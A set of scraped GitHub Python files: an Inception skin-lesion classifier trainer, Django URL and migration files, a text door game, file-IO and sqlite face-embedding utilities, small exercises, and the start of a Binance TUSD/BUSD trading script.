False\n\n\ndef initialize_model(model_name,checkpoint_path, num_classes, feature_extract):\n    # Initialize these variables which will be set in this if statement. 
Each of these\n # variables is model specific.\n model_ft = None\n input_size = 0\n\n if model_name == \"resnet\":\n \"\"\" Resnet18\n \"\"\"\n model_ft = models.resnet18(pretrained=\"imagenet\")\n set_parameter_requires_grad(model_ft, feature_extract)\n num_ftrs = model_ft.fc.in_features\n model_ft.fc = nn.Linear(num_ftrs, num_classes)\n input_size = 224\n\n elif model_name == \"alexnet\":\n \"\"\" Alexnet\n \"\"\"\n model_ft = models.alexnet(pretrained=\"imagenet\")\n set_parameter_requires_grad(model_ft, feature_extract)\n num_ftrs = model_ft.classifier[6].in_features\n model_ft.classifier[6] = nn.Linear(num_ftrs,num_classes)\n input_size = 224\n\n elif model_name == \"vgg\":\n \"\"\" VGG11_bn\n \"\"\"\n model_ft = models.vgg11_bn(pretrained=\"imagenet\")\n set_parameter_requires_grad(model_ft, feature_extract)\n num_ftrs = model_ft.classifier[6].in_features\n model_ft.classifier[6] = nn.Linear(num_ftrs,num_classes)\n input_size = 224\n\n elif model_name == \"squeezenet\":\n \"\"\" Squeezenet\n \"\"\"\n model_ft = models.squeezenet1_0(pretrained=\"imagenet\")\n set_parameter_requires_grad(model_ft, feature_extract)\n model_ft.classifier[1] = nn.Conv2d(512, num_classes, kernel_size=(1,1), stride=(1,1))\n model_ft.num_classes = num_classes\n input_size = 224\n\n elif model_name == \"densenet\":\n \"\"\" Densenet\n \"\"\"\n model_ft = models.densenet121(pretrained=\"imagenet\")\n set_parameter_requires_grad(model_ft, feature_extract)\n num_ftrs = model_ft.classifier.in_features\n model_ft.classifier = nn.Linear(num_ftrs, num_classes)\n input_size = 224\n\n elif model_name == \"inception\":\n \"\"\" Inception v3\n Be careful, expects (299,299) sized images and has auxiliary output\n \"\"\"\n model_ft = models.inception_v3(pretrained=\"imagenet\")\n set_parameter_requires_grad(model_ft, feature_extract)\n # Handle the auxilary net\n num_ftrs = model_ft.AuxLogits.fc.in_features\n model_ft.AuxLogits.fc = nn.Linear(num_ftrs, num_classes)\n # Handle the primary net\n num_ftrs = model_ft.fc.in_features\n model_ft.fc = nn.Linear(num_ftrs,num_classes)\n input_size = 299\n\n else:\n print(\"Invalid model name, exiting...\")\n exit()\n\n chpt = torch.load(checkpoint_path)\n model_ft.class_to_idx = chpt['class_to_idx']\n model_ft.load_state_dict(chpt['state_dict'])\n\n return model_ft, input_size\n\n\n\n\n######################################################################\nif __name__ == '__main__':\n\n input_shape = 299\n mean = [0.5, 0.5, 0.5]\n std = [0.5, 0.5, 0.5]\n scale = 360\n input_shape = 299\n learning_rate = 0.0005\n data_dir = \"C://Users//Sahan//ipthw//dermatologist-ai//data\"\n model_name = \"inception\"\n num_classes = 3\n batch_size = 64\n num_epochs = 30\n feature_extract = True\n\n\n\n\n data_transforms = {\n 'train': transforms.Compose([\n transforms.Resize(scale),\n transforms.RandomResizedCrop(input_shape),\n transforms.RandomHorizontalFlip(),\n transforms.RandomVerticalFlip(),\n transforms.RandomRotation(degrees=90),\n transforms.ToTensor(),\n transforms.Normalize(mean, std)]),\n 'valid': transforms.Compose([\n transforms.Resize(scale),\n transforms.CenterCrop(input_shape),\n transforms.ToTensor(),\n transforms.Normalize(mean, std)]),\n 'test': transforms.Compose([\n transforms.Resize(scale),\n transforms.CenterCrop(input_shape),\n transforms.ToTensor(),\n transforms.Normalize(mean, std)]),}\n\n print(\"Initializing Datasets and Dataloaders...\")\n\n# Create training and validation datasets\n image_datasets = {x: datasets.ImageFolder(os.path.join(data_dir, x), 
data_transforms[x]) for x in ['train', 'valid']}\n# Create training and validation dataloaders\n    dataloaders_dict = {x: torch.utils.data.DataLoader(image_datasets[x], batch_size=batch_size, shuffle=True, num_workers=4) for x in ['train', 'valid']}\n\n# Detect if we have a GPU available\n    device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n\n######################################################################\n\n    model_ft, input_size = initialize_model(model_name, 'inception_save.pth.tar', num_classes,feature_extract = True)\n\n    params_to_update = model_ft.parameters()\n    print(\"Params to learn:\")\n    if feature_extract:\n        params_to_update = []\n        for name,param in model_ft.named_parameters():\n            if param.requires_grad:\n                params_to_update.append(param)\n                print(\"\\t\",name)\n    else:\n        for name,param in model_ft.named_parameters():\n            if param.requires_grad:\n                print(\"\\t\",name)\n\n\n\n\n    model_ft = model_ft.to(device)\n\n\n    criterion = nn.CrossEntropyLoss()\n\n    model_ft, hist = train_model(model_ft, dataloaders_dict, criterion, learning_rate, num_epochs=num_epochs, is_inception=(model_name==\"inception\"))\n\n    model_ft.class_to_idx = image_datasets['train'].class_to_idx\n    checkpoint = {\n        'arch': 'inception_v3',\n        'class_to_idx': model_ft.class_to_idx,\n        'state_dict': model_ft.state_dict()}\n\n    torch.save(checkpoint, 'inception_save.pth.tar')\n","repo_name":"sahand68/Skin_cancer_Detection","sub_path":"inception_model.py","file_name":"inception_model.py","file_ext":"py","file_size_in_byte":9546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23040601894","text":"from django.contrib import admin\nfrom django.urls import path, include, re_path\n\nfrom rest_framework import permissions\nfrom drf_yasg.views import get_schema_view\nfrom drf_yasg import openapi\n\nschema_view = get_schema_view(\n    openapi.Info(\n        title=\"API Documentation\",\n        default_version='v1',\n        description=\"E-commerce documentation\",\n        terms_of_service=\"https://www.google.com/policies/terms/\",\n        contact=openapi.Contact(email=\"leonardoberoes94@gmail.com\"),\n        license=openapi.License(name=\"BSD License\"),\n    ),\n    public=True,\n    permission_classes=(permissions.AllowAny,),\n)\n\nurlpatterns = [\n    path('admin/', admin.site.urls),\n    path('characters/', include('characters.api.routers')),\n    path('movies/', include('movies.api.routers')),\n    re_path(r'^swagger(?P<format>\\.json|\\.yaml)$', schema_view.without_ui(cache_timeout=0), name='schema-json'),\n    re_path(r'^swagger/$', schema_view.with_ui('swagger', cache_timeout=0), name='schema-swagger-ui'),\n    re_path(r'^redoc/$', schema_view.with_ui('redoc', cache_timeout=0), name='schema-redoc'),\n\n]\n","repo_name":"leo98ber/star_wars_api","sub_path":"star_wars_characters_api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"35422585707","text":"import time\nplay = True\ndoor = 0\nprint(\"The game has begun!\")\nprint(\"There are 10 doors in front of you\")\nwhile play:\n    print(\"Choose a door\")\n    if door == 0:\n        try:\n            door = int(input())\n        except ValueError:\n            print(\"Choose a door\")\n
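    # Doors 1-10 each trigger one scripted event; most reset door to 0 so the player picks again, while the deadly ones end the loop.\n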
while play:\n    print(\"Choose a door\")\n    if door == 0:\n        try:\n            door = int(input())\n        except ValueError as e:\n            print(\"Choose a door\")\n    if door == 1:\n        print(\"Behind the door was an empty room\")\n        time.sleep(3)\n        door = 0\n    if door == 2:\n        print(\"Behind the door was treasure! You take it\")\n        time.sleep(3)\n        door = 0\n    if door == 3:\n        print(\"Behind the door was a huge spider!\\n\"\n              \"You die\")\n        time.sleep(2)\n        print(\"Game over\")\n        play = False\n    if door == 4:\n        print(\"You saw a ghost; it possessed you and jumped off the roof\\n\"\n              \"You die\")\n        time.sleep(2)\n        print(\"Game over\")\n        play = False\n    if door == 5:\n        print(\"You found a room with a fountain in it (who knows why)\\nYou drank some water from it (strange, but nothing happened)\")\n        door = 0\n    if door == 6:\n        print(\"Behind the door was an empty room\")\n        time.sleep(3)\n        door = 0\n    if door == 7:\n        print(\"You find the exit from this scary house\\n\"\n              \"You win!\")\n        time.sleep(3)\n        door = 0\n        play = False\n    if door == 8:\n        print(\"In the room you notice a skeleton lying on the floor; you get scared and run away\")\n        time.sleep(2)\n        door = 0\n    if door == 9:\n        print(\"You open the door and a poisoned arrow hits you\\n\"\n              \"You die\")\n        time.sleep(2)\n        play = False\n    if door == 10:\n        print(\"You find an enormous stash of food\\n\"\n              \"20 minutes later you gorge yourself and perish\\n\"\n              \"You die\")\n        time.sleep(2)\n        play = False\n","repo_name":"Axeleron7/GhostGame","sub_path":"Game/Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11423912150","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('reminders', '0009_auto_20150713_2104'),\n    ]\n\n    operations = [\n        migrations.AddField(\n            model_name='task',\n            name='is_completed',\n            field=models.BooleanField(verbose_name='Completed', default=True),\n            preserve_default=False,\n        ),\n        migrations.AlterField(\n            model_name='task',\n            name='date_end',\n            field=models.DateTimeField(verbose_name='Target Date of Completion'),\n        ),\n    ]\n","repo_name":"Lhwhatever/cep2015sem2","sub_path":"reminders/migrations/0010_auto_20150714_1755.py","file_name":"0010_auto_20150714_1755.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2068086771","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Feb 28 18:01:32 2016\n\n@author: T800GHB\nThis file demonstrates some basic file operations.\nThe recommended pattern for IO is the 'with' keyword\n\"\"\"\n\n\ndef run_demo():\n    \"\"\"\n    Open a file in read-only mode.\n    If the file does not exist, an IOError is raised.\n    Close the file when it is no longer needed, otherwise\n    the underlying system resource is not released.\n    \"\"\"\n    f1 = None\n    try:\n        f1 = open('filepath/filename', 'r')\n        f1.read()\n    finally:\n        if f1:\n            f1.close()\n    \"\"\"\n    Use the with keyword to open a file like the block above;\n    no explicit close call is needed.\n    \"\"\"\n    with open('filepath/filename','r') as f2: \n        \"\"\"\n        Read the whole file and store it in fp1.\n        The data remains available after the file is closed.\n        If the file is opened in 'r+' mode, it can also be written.\n        \"\"\"\n        fp1 = f2.read()\n        #Read a specific number of characters from the file.\n        fp2 = f2.read(1)\n        #Read one line from the file.\n        fp3 = f2.readline()\n
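The door game above repeats the same print/sleep/flag pattern for every door; one possible flattening is a table of outcomes (a sketch with illustrative names and a subset of the doors, not part of the original):

```python
import time

# door number -> (message, whether the game continues afterwards)
DOORS = {
    1: ("Behind the door was an empty room", True),
    3: ("Behind the door was a huge spider!\nYou die", False),
    7: ("You find the exit from this scary house\nYou win!", False),
}

def open_door(door: int) -> bool:
    message, keep_playing = DOORS.get(door, ("Nothing happens", True))
    print(message)
    time.sleep(2)
    return keep_playing
```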
        \"\"\"\n        Read all of the lines in the file and return them as a list.\n        fp4 is a list containing every line.\n        \"\"\"\n        fp4 = f2.readlines()\n        \n    with open('filepath/filename.bmp', 'rb') as f3:\n        \"\"\"\n        Read a binary file and store it in local memory\n        \"\"\"\n        bitmap = f3.read()\n        \n    with open('filepath/filename.txt','r',encoding = 'gbk', errors='ignore') as f4:\n        \"\"\"\n        Read a text file whose encoding is not UTF-8, ignoring any\n        illegal characters encountered while reading\n        \"\"\"\n        text = f4.read()\n        \n    with open('filepath/filename.txt', 'w') as f5:\n        \"\"\"\n        Write some content into the file.\n        \"\"\"\n        f5.write('Hello my mind')\n        #Move the file pointer back to the start of the file\n        f5.seek(0)\n        \n    with open('filepath/filename.txt', 'a') as f6:\n        \"\"\"\n        Write content to the end of the file, i.e. append it.\n        If you open an existing file in 'w' mode, the system will truncate\n        the file before writing whatever you want.\n        To check whether the file already exists, use\n        os.path.isfile('filename') first.\n        \"\"\"\n        f6.write('Hello again')\n        \n    str_list = ['hello','new','baby'] \n    with open('filepath/filename.txt', 'w') as f7:\n        '''\n        Write a list of strings into a file.\n        Note that writelines writes the strings back to back;\n        it does not add newlines between them.\n        '''\n        f7.writelines(str_list)\n    \n    \n    \n    \n    \n","repo_name":"T800GHB/Python_Basic","sub_path":"basic_io/file_io.py","file_name":"file_io.py","file_ext":"py","file_size_in_byte":2691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11033157434","text":"import sqlite3\nimport time\nfrom datetime import datetime\nimport pandas as pd\nimport numpy as np\nimport yaml\nimport os\nimport create_database\n\n# get configuration file's information\nconfig = yaml.load(open('config.yaml'), Loader=yaml.SafeLoader)\n\n\ndef convert_to_binary_data(filename):\n    \"\"\"\n    Convert an image file to bytes for storing in the DB\n    :param filename:\n    :return:\n    \"\"\"\n    # time_start = datetime.now()\n    with open(filename, 'rb') as file:\n        blob_data = file.read()\n    # time_stop = datetime.now()\n    # count_time = (time_stop - time_start)\n    # total_seconds = count_time.total_seconds()\n    # print(\"[INFO]-- Cost time to convert image\", total_seconds)\n    return blob_data\n\n\ndef list_to_string(input_list):\n    \"\"\"\n    Convert a list to a string (for bbox)\n    :param input_list:\n    :return:\n    \"\"\"\n    str_result = ' '.join([str(elem) for elem in input_list])\n    return str_result\n\n\ndef compare_features(feature, all_features):\n    \"\"\"\n    Compare a feature vector against all stored vectors and return the most similar one\n    :param feature:\n    :param all_features:\n    :return:\n    \"\"\"\n    sims = np.dot(all_features, feature)\n    pare_index = np.argmax(sims)\n    score = sims[pare_index]\n    return score, pare_index\n\n\n# connect to database\nconn = sqlite3.connect(config[\"database_name\"]+\".db\")\nc = conn.cursor()\n\n\ndef insert_db(data, table_name):\n    \"\"\"\n    Insert data into DB\n    :param data:\n    :param table_name:\n    :return:\n    \"\"\"\n    global conn\n    global c\n\n    try:\n        time_start = datetime.now()\n        data_form_add = pd.DataFrame.from_dict(data)\n        data_form_add.to_sql(table_name, conn, if_exists='append', index=False)\n        conn.commit()\n        time_stop = datetime.now()\n        count_time = (time_stop - time_start)\n        total_seconds = count_time.total_seconds()\n        print(\"Cost time to insert Data to\", table_name, \"table: \", total_seconds, \"s\")\n    except sqlite3.Error as error:\n        print(\"Failed to insert Data into\", table_name, \"table because of error: \", error)\n\n\ndef delete_by_uuid(uuid_, table_name_):\n    
\"\"\"\n Using to delete one user(usually spot user) based on its uuid\n :param table_name_:\n :param uuid_:\n :return:\n \"\"\"\n global conn\n global c\n\n try:\n delete_query = f\"DELETE FROM '{table_name_}' WHERE uuid = '{uuid_}'\"\n c.execute(delete_query)\n conn.commit()\n print(\"Deleted uuid \", uuid_,\"at table\", table_name_, \" - DONE\")\n except sqlite3.Error as error:\n print(\"Failed to Deleted uuid \", uuid_,\"at table\", table_name_, \"because of error: \", error)\n\n\ndef delete_multiple_uuids(list_uuids, table_name):\n \"\"\"\n Using to delete multiple users based on a list of uuids\n :param table_name:\n :param list_uuids:\n :return:\n \"\"\"\n global conn\n global c\n\n try:\n list_of_ques = \", \".join(\"?\" * len(list_uuids))\n delete_multiple_query = f\"DELETE FROM '{table_name}' WHERE uuid IN ({list_of_ques})\"\n c.execute(delete_multiple_query, list_uuids)\n conn.commit()\n print(\"Deleted multiple uuids \", list_uuids, \" - DONE\")\n except sqlite3.Error as error:\n print(\"Failed to Deleted uuid \", list_uuids, \"at table\", table_name, \"because of error: \", error)\n\n\ndef query_all_vectors_for_matching(masked=1):\n \"\"\"\n Query all feature vectors of all users(uuids) from database based on masked value\n :param masked:\n :return:\n \"\"\"\n global conn\n global c\n\n try:\n query_all_feature_vectors = f\"SELECT * FROM EMBEDDINGS WHERE masked_face = '{masked}'\"\n time_start = datetime.now()\n c.execute(query_all_feature_vectors)\n return_all_feature_vector = c.fetchall()\n time_stop = datetime.now()\n count_time = (time_stop-time_start)\n total_seconds = count_time.total_seconds()\n print(\"Cost time for all feature vectors from DB: \", total_seconds, \"s\")\n conn.commit()\n return return_all_feature_vector\n except sqlite3.Error as error:\n print(\"Failed to query all vectors for matching because of error: \", error)\n return None\n\n\ndef query_vectors_by_uuid(uuid, masked_st):\n \"\"\"\n Query all feature vectors by uuids and masked_st(to check for updating vector)\n :param masked_st:\n :param uuid:\n :return:\n \"\"\"\n global conn\n global c\n\n try:\n query_vectors_uuid = f\"SELECT * FROM EMBEDDINGS WHERE uuid = '{uuid}' and masked_face = '{masked_st}'\"\n time_start = datetime.now()\n c.execute(query_vectors_uuid)\n return_all_vectors = c.fetchall()\n time_stop = datetime.now()\n count_time = (time_stop - time_start)\n total_seconds = count_time.total_seconds()\n print(\"Cost time for querying feature vectors of \", uuid, \"from DB: \", total_seconds, \"s\")\n conn.commit()\n return return_all_vectors\n except sqlite3.Error as error:\n print(\"Failed to query feature vectors of \", uuid, \"from DB because of error: \", error)\n return None\n\n\ndef update_oldest_vector(uuid_, new_vector):\n \"\"\"\n Update oldest vector by new vector at specific uuid\n :param uuid_:\n :param new_vector:\n :return:\n \"\"\"\n global conn\n global c\n\n try:\n update_query = f\"UPDATE EMBEDDINGS SET feature_vector = '{new_vector}', updated_at = '{str(datetime.now())}' \" \\\n f\"WHERE uuid = '{uuid_}' AND updated_at = (SELECT updated_at FROM EMBEDDINGS \" \\\n f\"WHERE uuid = '{uuid_}' ORDER BY updated_at ASC LIMIT 1)\"\n c.execute(update_query)\n conn.commit()\n print(\"Update oldest vector for uuid: \", uuid_, \" -DONE\")\n except sqlite3.Error as error:\n print(\"Failed to update vector for: \", uuid_, \"because of error: \", error)\n return None\n\n\ndef update_regis_status(uuid_, regis_infor):\n global conn\n global c\n\n try:\n update_value = 1\n 
update_regis_query = f\"UPDATE UUIDS SET '{regis_infor}' = '{update_value}', \" \\\n f\"updated_at = '{str(datetime.now())}' WHERE uuid = '{uuid_}' \"\n c.execute(update_regis_query)\n conn.commit()\n print(\"Update oldest vector for uuid: \", uuid_, \" -DONE\")\n except sqlite3.Error as error:\n print(\"Failed to update register masked face status for: \", uuid_, \"because of error: \", error)\n\n\ndef query_five_latest_vectors_for_matching():\n \"\"\"\n Query all feature vectors of all users(uuids) from database based on masked value\n :return: query results\n \"\"\"\n global conn\n global c\n\n try:\n uuid_list = [\"uuid0\", \"uuid1\", \"uuid2\"]\n query_all_feature_vectors = \"SELECT uuid, updated_at FROM EMBEDDINGS WHERE uuid in (SELECT uuid FROM UUIDS) \" \\\n \"ORDER BY updated_at ASC LIMIT 5\"\n # query_all_feature_vectors = \"SELECT uuid FROM UUIDS\"\n\n # query_ex = \"SELECT * FROM( SELECT * FROM BOOK, AUTHOR WHERE BOOK.AUTHORID = AUTHOR.AUTHORID) T1 \" \\\n # \"WHERE T1.BOOKID IN( SELECT T2.BOOKID FROM BOOK T2 WHERE T2.AUTHORID = T1.AUTHORID ORDER \" \\\n # \"BY T2.BOOKTITLE LIMIT 2 ) ORDER BY T1.BOOKTITLE\"\n time_start = datetime.now()\n c.execute(query_all_feature_vectors)\n return_all_feature_vector = c.fetchall()\n time_stop = datetime.now()\n count_time = (time_stop - time_start)\n total_seconds = count_time.total_seconds()\n print(\"Cost time for all feature vectors from DB: \", total_seconds, \"s\")\n conn.commit()\n return return_all_feature_vector\n except sqlite3.Error as error:\n print(\"Failed to query all vectors for matching because of error: \", error)\n return None\n\n\ndef query_from_db_test(name_of_table):\n \"\"\"\n Query all feature vector from database based on masked value FOR TESTING\n :param name_of_table:\n :return:\n \"\"\"\n global conn\n global c\n\n select_all_query = f\"SELECT * FROM '{name_of_table}'\"\n time_start = datetime.now()\n c.execute(select_all_query)\n result_select_all = c.fetchall()\n time_stop = datetime.now()\n count_time = (time_stop-time_start)\n total_seconds = count_time.total_seconds()\n print(\"[INFO]-- Cost time for query data from local database\", total_seconds)\n conn.commit()\n return result_select_all\n\n\ndef get_uuid_data_form(uuid_, name_, age_, gender_, level_, master_user_):\n \"\"\"\n Convert uuid_data to form to insert into DB\n :param uuid_:\n :param name_:\n :param age_:\n :param gender_:\n :param level_:\n :param master_user_:\n :return:\n \"\"\"\n uuid_data_form = {\n \"uuid\": [uuid_],\n \"name\": [name_],\n \"age\": [age_],\n \"gender\": [gender_],\n \"level\": [level_],\n \"master_user\": [master_user_],\n \"regis_masked\": 0,\n \"regis_non_masked\": 0,\n \"updated_at\": [str(datetime.now())],\n \"created_at\": [str(datetime.now())]\n }\n return uuid_data_form\n\n\ndef get_embeddings_data_form(uuid_, feature_vector_, masked_face_, iamge_, bbox_):\n \"\"\"\n Convert embeddings_data to form to insert into DB\n :param uuid_:\n :param feature_vector_:\n :param masked_face_:\n :param iamge_:\n :param bbox_:\n :return:\n \"\"\"\n converted_feature_vector = feature_vector_.tostring()\n converted_image = convert_to_binary_data(iamge_)\n\n embeddings_data_form = {\n \"uuid\": [uuid_],\n \"feature_vector\": [converted_feature_vector],\n \"masked_face\": [masked_face_],\n \"image\": [converted_image],\n \"bbox_tlx\": [bbox_[0]],\n \"bbox_tly\": [bbox_[1]],\n \"bbox_brx\": [bbox_[2]],\n \"bbox_bry\": [bbox_[3]],\n \"updated_at\": [str(datetime.now())],\n \"created_at\": [str(datetime.now())]\n }\n\n return 
embeddings_data_form\n\n\ndef get_checkin_data_form(uuid_, checkin_image_, checkin_vector_, checkin_bbox_, checkin_masked_):\n \"\"\"\n Convert checkin_data to form to insert into DB\n :param uuid_:\n :param checkin_image_:\n :param checkin_vector_:\n :param checkin_bbox_:\n :param checkin_masked_:\n :return: formed checkin_data\n \"\"\"\n converted_checkin_image = convert_to_binary_data(checkin_image_)\n converted_feature_vector = checkin_vector_.tostring()\n\n checkin_data_form = {\n \"uuid\": [uuid_],\n \"checkin_time\": [str(datetime.now())],\n \"checkin_image\": [converted_checkin_image],\n \"checkin_vector\": [converted_feature_vector],\n \"checkin_bbox_tlx\": [checkin_bbox_[0]],\n \"checkin_bbox_tly\": [checkin_bbox_[1]],\n \"checkin_bbox_brx\": [checkin_bbox_[2]],\n \"checkin_bbox_bry\": [checkin_bbox_[3]],\n \"checkin_masked\": [checkin_masked_],\n }\n\n return checkin_data_form\n\n\nif __name__ == \"__main__\":\n if not os.path.exists(config[\"database_name\"]+\".db\"):\n create_database.final_create_db()\n\n number_uuid = 3\n uuid_data_ = {\n \"uuid\": [\"uuid\"+str(i) for i in range(number_uuid)],\n \"name\": [\"name_0\" for i in range(number_uuid)],\n \"age\": [i+20 for i in range(number_uuid)],\n \"gender\": ['male' for _ in range(number_uuid)],\n \"level\": [1 for _ in range(number_uuid)],\n \"master_user\": [1 for _ in range(number_uuid)],\n \"regis_masked\": [0 for _ in range(number_uuid)],\n \"regis_non_masked\": [0 for _ in range(number_uuid)],\n \"updated_at\": [str(datetime.now()) for _ in range(number_uuid)],\n \"created_at\": [str(datetime.now()) for _ in range(number_uuid)]\n }\n\n # insert_db(uuid_data_, \"UUIDS\")\n result_ = query_from_db_test(\"UUIDS\")\n # print(\"result: \", len(result_))\n result_ = [result_[i][0] for i in range(len(result_))]\n print(\"uuid table result: \", result_)\n\n image_path = \"./avatar.jpg\"\n bbox_ = [1, 2, 3, 4]\n num_embed = 7\n list_of_uuid = [str(\"uuid\"+str(i)) for i in range(3)]\n\n # for uuid__ in list_of_uuid:\n # embeddings_data_ = {\n # \"uuid\": [uuid__ for _ in range(num_embed)],\n # \"feature_vector\": [np.random.rand(512).tostring() for _ in range(num_embed)],\n # \"masked_face\": [1 for _ in range(num_embed)],\n # \"image\": [convert_to_binary_data(image_path) for _ in range(num_embed)],\n # \"bbox_tlx\": [bbox_[0] for _ in range(num_embed)],\n # \"bbox_tly\": [bbox_[1] for _ in range(num_embed)],\n # \"bbox_brx\": [bbox_[2] for _ in range(num_embed)],\n # \"bbox_bry\": [bbox_[3] for _ in range(num_embed)],\n # \"updated_at\": [str(datetime.now()) for _ in range(num_embed)],\n # \"created_at\": [str(datetime.now()) for _ in range(num_embed)]\n # }\n #\n # insert_db(embeddings_data_, \"EMBEDDINGS\")\n\n result_e = query_from_db_test(\"EMBEDDINGS\")\n print(len(result_e[0]))\n result_uuid = [result_e[i][0] for i in range(len(result_e))]\n print(\"embeddings table result: \", result_uuid, len(result_uuid))\n\n result_time = [result_e[i][8] for i in range(len(result_e))]\n print(\"embeddings table result - time: \", result_time, len(result_time))\n\n query_5_result = query_five_latest_vectors_for_matching()\n print(query_5_result)\n\n # checkin_image_path = \"./avatar.jpg\"\n # checkin_number = 10\n # checkin_bbox_ = [5, 6, 7, 8]\n # checkin_data_ = {\n # \"uuid\": [\"uuid_2\" for i in range(checkin_number)],\n # \"checkin_time\": [str(datetime.now()) for _ in range(checkin_number)],\n # \"checkin_image\": [convert_to_binary_data(checkin_image_path) for _ in range(checkin_number)],\n # \"checkin_vector\": 
[np.random.rand(512).tostring() for _ in range(checkin_number)],\n    #     \"checkin_bbox_tlx\": [checkin_bbox_[0] for _ in range(checkin_number)],\n    #     \"checkin_bbox_tly\": [checkin_bbox_[1] for _ in range(checkin_number)],\n    #     \"checkin_bbox_brx\": [checkin_bbox_[2] for _ in range(checkin_number)],\n    #     \"checkin_bbox_bry\": [checkin_bbox_[3] for _ in range(checkin_number)],\n    #     \"checkin_masked\": [1 for _ in range(checkin_number)],\n    # }\n\n    # result_vector = query_from_db_test()\n    # # print(\"All vectors: \", result_vector, len(result_vector))\n    # final_result = [result_vector[i][0] for i in range(len(result_vector))]\n    # print(\"before result: \", final_result)\n    #\n    # # uuid_in = \"uuid_0\"\n    # # delete_uuid(uuid_in)\n    #\n    # list_of_uuids = [\"uuid_0\"]\n    # delete_multiple_uuid(list_of_uuids)\n    #\n    # result_vector = query_from_db_test()\n    # # print(\"All vectors: \", result_vector, len(result_vector))\n    # final_result = [result_vector[i][0] for i in range(len(result_vector))]\n    # print(\"after result: \", final_result)\n","repo_name":"MinhDung0803/sql-test-flabor","sub_path":"sqlite/sqlite_test.py","file_name":"sqlite_test.py","file_ext":"py","file_size_in_byte":14587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73306276967","text":"#!/usr/bin/python3\n\nweekdays = [\n    \"monday\",\n    \"tuesday\",\n    \"wednesday\",\n    \"thursday\",\n    \"friday\",\n    \"saturday\",\n    \"sunday\"\n]\n\nnum = int(input(\"Give number of the day: \"))\nif num > 0 and num < 8:\n    num = num - 1\n    print(f\"day is {weekdays[num]}\")\n","repo_name":"kosvi/Centria_Python","sub_path":"w3/e2.py","file_name":"e2.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21451968535","text":"from typing import Optional\n\nfrom common.tree_node import TreeNode\n\nclass Solution:\n    def longestConsecutive(self, root: Optional[TreeNode]) -> int:\n        if not root:\n            return 0\n        self.ans = 0\n        self.dfs(root, 1)\n        return self.ans\n\n    def dfs(self, node: 'TreeNode', path: int) -> None:\n        self.ans = max(self.ans, path)\n        if node.left:\n            if node.left.val == node.val + 1:\n                self.dfs(node.left, path+1)\n            else:\n                self.dfs(node.left, 1)\n        if node.right:\n            if node.right.val == node.val + 1:\n                self.dfs(node.right, path+1)\n            else:\n                self.dfs(node.right, 1)\n    ","repo_name":"jerrt2003/leetcode-in-python","sub_path":"298_Binary_Tree_Longest_Consecutive_Sequence/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15534746009","text":"import os\nfrom os.path import join, dirname \nfrom time import sleep\nfrom dotenv import load_dotenv\nimport schedule\nimport sys\nimport threading\nfrom binance.enums import *\nfrom binance.exceptions import BinanceAPIException\nimport datetime\nimport numpy as np\nimport decimal\n\n\n# The API key and secret are stored in a .env file.\n# Create a .env file following .env_template and save it next to main.py.\nload_dotenv(verbose=True)\ndotenv_path = join(dirname(__file__), '.env')\nload_dotenv(dotenv_path)\n\n# Load the API key and secret into variables\napi_key = os.environ.get(\"KEY\")\napi_secret = os.environ.get(\"SECRET\")\n\nfrom binance import Client, ThreadedWebsocketManager, ThreadedDepthCacheManager\nclient = Client(api_key, api_secret) # create the client\n\n\n\n\n\n\n\n# 3. Accept the order queue\n# \t- Order condition : stop-limit orders buying at the 10-minute low and selling at the 10-minute high\n# \t- Order method : limit order\n# \t- Currency pair : TUSD/BUSD\n# \t- Order quantity : 50% of the wallet assets (only assets usable for this pair; assumes 1x leverage; position PnL is not considered)\n\n\n\n\n
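The solution above imports `TreeNode` from a local `common.tree_node` module that is not included here; it presumably matches the conventional definition:

```python
# Conventional binary-tree node, assumed to match common.tree_node.
class TreeNode:
    def __init__(self, val=0, left=None, right=None):
        self.val = val
        self.left = left
        self.right = right
```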
\ndef info():\n    \n\n\t# - Wallet balance\n    account_info = client.get_account_snapshot(type='SPOT')\n    total_asset_of_Btc = account_info['snapshotVos'][0]['data']['totalAssetOfBtc']\n    print('Wallet balance')\n    print(f'Wallet balance (BTC): {total_asset_of_Btc}')\n    # BNB balance\n    bnb_balance = client.get_asset_balance(asset='BNB')\n    print(f'BNB balance: {bnb_balance}')\n\n\n\n\t# - Profit and loss\n    print('Profit and loss')\n\t# - Positions and currency information held\n    [print(x) for x in account_info['snapshotVos'][0]['data']['balances']]\n\n\n\n\ntimes = 10\n\ndef order():\n\n\n    order_symbol='TUSDBUSD'\n\n    order_side=SIDE_BUY\n    order_type=ORDER_TYPE_TAKE_PROFIT_LIMIT\n    order_timeInForce=TIME_IN_FORCE_GTC\n    order_quantity = '10.00000000' # overwritten later\n    order_price='1.00000' # overwritten later\n    order_stopprice = '1.00000' # overwritten later\n\n    revorder_side=SIDE_SELL\n    revorder_type=ORDER_TYPE_TAKE_PROFIT_LIMIT\n    revorder_timeInForce=TIME_IN_FORCE_GTC\n    revorder_quantity = '10.00000000' # overwritten later\n    revorder_price='1.00000' # overwritten later\n    revorder_stopprice = '1.00000' # overwritten later\n\n    chk_order = client.get_open_orders(symbol=order_symbol)\n\n    # do not trade while at least one order is already open\n    if len(chk_order) > 0:\n        print(('Open orders exist, aborting'))\n        return 